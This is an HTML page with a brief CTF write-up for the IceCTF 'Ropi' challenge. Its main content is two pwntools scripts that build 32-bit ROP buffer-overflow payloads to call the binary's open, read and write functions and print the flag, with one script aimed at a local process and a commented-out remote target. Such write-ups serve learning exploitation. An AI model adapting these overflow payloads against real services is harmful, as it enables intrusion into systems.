<html>
 <head>
<title> Ropi </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Ropi </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> IceCTF Ropi Writeup  </h1>
   
 <br> 

<p> This Problem took me few days but still i was unable to finish it .. but then my senior helped me out  <br>
    This binary accepts a message which contains buffer .... yeah vulnerable to overflow !! But the thing you have to do is execute three func ret, ori , pro which open ,read, write the flag 
     Yeah u have to do it by ROP . </p> <br> <br>

<code>from pwn import *

context.bits=32

ret=0x8048569
ori=0x80485c4
pro=0x804862c
popret=0x8048395
pop2ret=0x80486ee
ezy=0x0804852d

rete=0x804837e

payload="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(ezy)

payload2="B"*47+pack(ori)+pack(pop2ret)+pack(0xABCDEFFF)+pack(0x78563412)+pack(pro)


print payload 

print payload2 </code>


<p> The above one works , all credit goes to my senior but i will also post my payload which works locally not in the server  don't know why but i learnt one thing <br>
  we can make everything in life much simpler than we think :) <br> <br> </p>

<code> from pwn import *

context.bits=32

ret=0x8048569
ori=0x80485c4
pro=0x804862c
popret=0x8048395
pop2ret=0x80486ee
ezy=0x0804852d
prop=0x0804863e

rete=0x804837e

payload="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(ezy)

payload2="A"*44+pack(ori)+pack(pop2ret)+pack(0xABCDEFFF)+pack(0x78563412)+pack(prop)

#payload3="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(pro)

# binary starts 

p=process('ropi')

#p=remote('ropi.vuln.icec.tf',6500)

msg=p.recvuntil('?\n')

print msg

p.sendline(payload) # for first read through main

msg=p.recvuntil('?\n')

print msg

p.sendline(payload2)

"""msg=p.recvuntil('?\n')

print msg+" read by exploit 2"

p.sendline(payload3)"""

msg=p.recvall()

print msg </code>

</body>
</html>